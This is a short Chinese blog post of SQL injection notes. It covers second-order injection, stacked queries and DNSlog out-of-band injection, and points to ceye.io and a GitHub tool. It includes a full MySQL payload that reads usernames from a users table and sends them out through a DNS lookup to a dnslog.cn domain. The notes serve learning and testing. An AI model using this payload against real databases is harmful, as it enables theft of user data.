数据库注入小细节

数据库注入小细节

二次注入   通过登入注册将语句写入数据库中     通过修改密码之类的使其被调用  从而完成二次注入 

dnslog注入     在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,        网站回显网站dns有  http://ceye.io/      注入工具  https://github.com/ADOOO/DnslogSqlinj    需要把网站dns的  identifie    和   token  导入到工具中    

每一级域名长度是63个字符超出了就是错误不查询 group_concat联合查询会自动用','进行分割 域名地址只能出现数字,字母,下划线; 通过replace将','转换'——' 所以代码可以写成 select load_file(concat('\\\\',(select SUBSTR(replace((group_concat(username )),',','_'),1,63) from users),'.qnpqsu.dnslog.cn/abc'))

堆叠    通过;进行多个sql语句同时执行

 

 

上一篇:MySQL group_concat 长度限制


下一篇:Mysql常用函数之Concat函数